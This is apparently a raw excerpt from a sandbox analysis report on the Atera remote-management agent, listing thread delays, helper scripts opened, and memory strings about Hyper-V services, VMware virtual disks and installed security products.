                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595313
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594704
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594579
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594454
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594329
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594204
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594079
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593704
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593579
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593454
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593329
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593214
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592969
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592847
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 30000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599887
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599641
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599516
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599404
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599283
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599172
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599063
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598813
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598464
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598348
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598227
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598114
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597982
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597750
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597638
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597513
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597399
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597087
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596469
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596235
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596105
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595683
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595568
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595452
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595331
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594823
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594260
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594148
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594035
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593793
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593683
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593346
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593232
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593125
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-CheckSumValid.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Format-FileSize.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariableNames.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-EnvironmentVariable.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyUnzip.ps1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile opened: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions\Get-ChocolateyWebFile.ps1
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service0
                                Source: svchost.exe, 00000027.00000003.2646425224.0000028F330EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                                Source: svchost.exe, 00000027.00000002.3053754465.0000028F330A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 :
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: svchost.exe, 00000027.00000002.3052460045.0000028F3301C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A0VMwareVirtual disk
                                Source: svchost.exe, 00000027.00000002.3053754465.0000028F330A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A0
                                Source: svchost.exe, 00000027.00000002.3055813071.0000028F330E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @friendlyname"vmware virtual disk"
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStoppedl_
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2470445287.00000125E4736000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975238752.0000016E75D8D000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975422901.0000016E75DE2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE28000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000000.2691141024.000002C38B3B2000.00000002.00000001.01000000.00000035.sdmpBinary or memory string: VMware Tools)Cisco Webex Meetings
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"p^/
                                Source: svchost.exe, 00000027.00000003.2646425224.0000028F330EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: AgentPackageInternalPoller.exe, 00000039.00000002.2730506028.000001AA4B780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllii
                                Source: AgentPackageAgentInformation.exe, 00000014.00000000.2149423855.00000167D1432000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: svchost.exe, 00000027.00000002.3053448080.0000028F33067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2468014971.00000125E45E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStopped
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2468014971.00000125E45E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStopped
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2365797816.000001D722822000.00000002.00000001.01000000.0000001D.sdmpBinary or memory string: vmware
                                Source: svchost.exe, 00000027.00000002.3053081866.0000028F3303C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStoppedZ
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2379078434.000001D73BA20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2714307229.00000215C1E37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                                Source: svchost.exe, 00000027.00000002.3052460045.0000028F33013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: manufacturer"vmware"
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStopped$
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"muE
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface0
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor0
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStopped&C
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: svchost.exe, 00000027.00000002.3055813071.0000028F330E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@friendlyname"vmware virtual disk"
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2713416198.00000215C1E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>
                                Source: svchost.exe, 00000027.00000002.3053081866.0000028F3303C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2468438514.00000125E462D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStopped-)T
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Win32_Service.Name="vmicshutdown"p^/
                                Source: svchost.exe, 00000027.00000002.3054334948.0000028F330B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @"VMware Virtual disk"
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service0
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2714307229.00000215C1E37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStopped
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2720119619.00000215C1EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStoppedll
                                Source: svchost.exe, 00000027.00000002.3053754465.0000028F330A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1aa-12.0
                                Source: svchost.exe, 00000027.00000002.3053081866.0000028F3303C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 @
                                Source: rundll32.exe, 00000004.00000002.1889320009.00000000034AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2045754569.00000000028D6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2188999803.00000167EA688000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2189043377.00000280D397C000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2470210331.00000125E4717000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000002.3129190490.0000015439D8E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2967904200.000001AF6BD20000.00000004.00000020.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3326560482.00000277F85E0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2819380529.000001FC60824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2722603708.00000215C2017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCC
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"Oug
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2469194270.00000125E4681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown>
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStopped
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStopped
